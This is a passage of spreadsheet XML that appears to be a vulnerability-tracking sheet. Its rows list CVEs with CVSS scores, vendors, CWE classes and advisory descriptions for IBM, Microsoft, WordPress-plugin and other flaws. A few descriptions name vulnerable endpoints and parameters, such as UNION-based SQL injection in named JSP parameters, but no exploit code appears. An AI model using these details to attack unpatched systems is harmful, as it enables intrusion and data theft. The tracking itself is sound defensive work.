      <c r="D393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E393" s="5" t="inlineStr"/>
      <c r="F393" s="5" t="inlineStr"/>
      <c r="G393" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special characters in flow display names.</t>
        </is>
      </c>
      <c r="M393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81940</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81941</t>
        </is>
      </c>
      <c r="C394" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E394" s="5" t="inlineStr"/>
      <c r="F394" s="5" t="inlineStr"/>
      <c r="G394" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L394"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M394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81941</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="C395" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E395" s="5" t="inlineStr"/>
      <c r="F395" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G395" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H395" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="C396" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E396" s="5" t="inlineStr"/>
      <c r="F396" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G396" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="C397" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E397" s="5" t="inlineStr"/>
      <c r="F397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G397" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H397" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82092</t>
        </is>
      </c>
      <c r="C398" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="inlineStr"/>
      <c r="G398" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82092</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82095</t>
        </is>
      </c>
      <c r="C399" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="inlineStr"/>
      <c r="G399" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82095</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82097</t>
        </is>
      </c>
      <c r="C400" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E400" s="5" t="inlineStr"/>
      <c r="F400" s="5" t="inlineStr"/>
      <c r="G400" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to a Server-Side Request Forgery (SSRF) vulnerability.</t>
        </is>
      </c>
      <c r="M400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82097</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82098</t>
        </is>
      </c>
      <c r="C401" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="inlineStr"/>
      <c r="G401" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82098</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82099</t>
        </is>
      </c>
      <c r="C402" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="inlineStr"/>
      <c r="G402" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82099</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="C403" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G403" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H40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03" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="C404" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E404" s="5" t="inlineStr"/>
      <c r="F404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G404" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H40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04" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L404" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84889</t>
        </is>
      </c>
      <c r="C405" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E405" s="5" t="inlineStr"/>
      <c r="F405" s="5" t="inlineStr"/>
      <c r="G405" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.3 could allow a remote authenticated attacker to execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84889</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85228</t>
        </is>
      </c>
      <c r="C406" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E406" s="5" t="inlineStr"/>
      <c r="F406" s="5" t="inlineStr"/>
      <c r="G406" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L406" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the tensor buffer validation component in Amazon Deep Java Library (DJL) from 0.13.0 through 0.36.0 on all platforms might allow a remote unauthenticated actor to obtain information from adjacent process memory or cause a denial of service via a crafted tensor payload.
To remediate this issue, users should upgrade to version 0.37.0 or above.</t>
        </is>
      </c>
      <c r="M406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85228</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85677</t>
        </is>
      </c>
      <c r="C407" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E407" s="5" t="inlineStr"/>
      <c r="F407" s="5" t="inlineStr"/>
      <c r="G407" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L407" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse News  WordPress plugin before 3.3.3 does not restrict the extra HTML it adds to WordPress's allowed elements to the context it is meant for, applying the same relaxed list to every sanitisation context including untrusted comments, allowing unauthenticated users to store JavaScript that will execute in the browser of any administrator who reviews the comment queue, and of any visitor to the post once the comment is approved.</t>
        </is>
      </c>
      <c r="M407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85677</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="C408" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E408" s="5" t="inlineStr"/>
      <c r="F408" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G408" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H408" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="I408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L408" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87585</t>
        </is>
      </c>
      <c r="C409" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E409" s="5" t="inlineStr"/>
      <c r="F409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G409" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H409" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I409" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr">
        <is>
          <t>Double free in PDFium in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87585</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37267</t>
        </is>
      </c>
      <c r="C410" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G410" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=19.180.0 and &lt;23.25.1, when used with Azure DevOps, may expose the bot's authorization token in server or pipeline logs because the git http.extraheader=AUTHORIZATION parameter is logged without redaction. Anyone with access to saved logs could obtain the bot credentials. Fixed in 23.25.1; Azure DevOps users should revoke and regenerate credentials if logs may have been exposed.</t>
        </is>
      </c>
      <c r="M410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37267</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-50997</t>
        </is>
      </c>
      <c r="C411" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E411" s="5" t="inlineStr"/>
      <c r="F411" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G411" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr">
        <is>
          <t>Weaver (Fanwei) E-cology 8.0 and 9.0 contains a SQL injection vulnerability in the HrmCareerApplyPerView.jsp endpoint that allows unauthenticated remote attackers to extract arbitrary data from the backend database by manipulating the id GET parameter. Attackers can send a single crafted GET request with UNION-based injection payloads through the unsanitized id parameter to retrieve arbitrary data from the Microsoft SQL Server backend. This vulnerability is potentially remediated in software version 10.53 or 10.54. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-50997</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58374</t>
        </is>
      </c>
      <c r="C412" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E412" s="5" t="inlineStr"/>
      <c r="F412" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G412" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr">
        <is>
          <t>Hongjing e-HR contains an unauthenticated SQL injection vulnerability in the getSdutyTree servlet endpoint that allows remote unauthenticated attackers to access protected resources by supplying a path traversal sequence in the request URI to bypass the oauthservlet authentication filter. Attackers can inject UNION-based SQL payloads through the unsanitized codeitemid parameter into the underlying Microsoft SQL Server query to retrieve sensitive database contents including user credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-07-30 (UTC).</t>
        </is>
      </c>
      <c r="M412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58374</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10143</t>
        </is>
      </c>
      <c r="C413" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E413" s="5" t="inlineStr"/>
      <c r="F413" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G413" s="5" t="inlineStr">
        <is>
          <t>python, kafka</t>
        </is>
      </c>
      <c r="H413" s="5" t="inlineStr">
        <is>
          <t>dpkp:kafka-python</t>
        </is>
      </c>
      <c r="I413" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-606</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr">
        <is>
          <t>kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in SCRAM authentication handling that allows a malicious or machine-in-the-middle broker to freeze the client event loop by supplying an excessively large iteration count. In scram.py, ScramClient.process_server_first_message() passes the broker-controlled SCRAM iteration count directly to hashlib.pbkdf2_hmac() without validation, blocking producer sends, consumer polls, admin operations, and heartbeats, which can cause consumer group eviction and repeated reconnect failures.</t>
        </is>
      </c>
      <c r="M413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10143</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16174</t>
        </is>
      </c>
      <c r="C414" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E414" s="5" t="inlineStr"/>
      <c r="F414" s="5" t="inlineStr"/>
      <c r="G414" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>Netskope was notified about a potential gap in Netskope Endpoint DLP (EPDLP) running on Windows systems. Successful exploitation of the gap could potentially allow a privileged user to send a crafted message to the EPDLP process port to trigger an integer overflow, leading to memory corruption. Successful exploitation would require the EPDLP module to be enabled in the client configuration, and that Memory Integrity is disabled. A successful exploit could potentially result in a denial-of-service, arbitrary code execution, or privilege escalation on the local machine.</t>
        </is>
      </c>
      <c r="M414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16174</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18608</t>
        </is>
      </c>
      <c r="C415" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E415" s="5" t="inlineStr"/>
      <c r="F415" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G415" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr">
        <is>
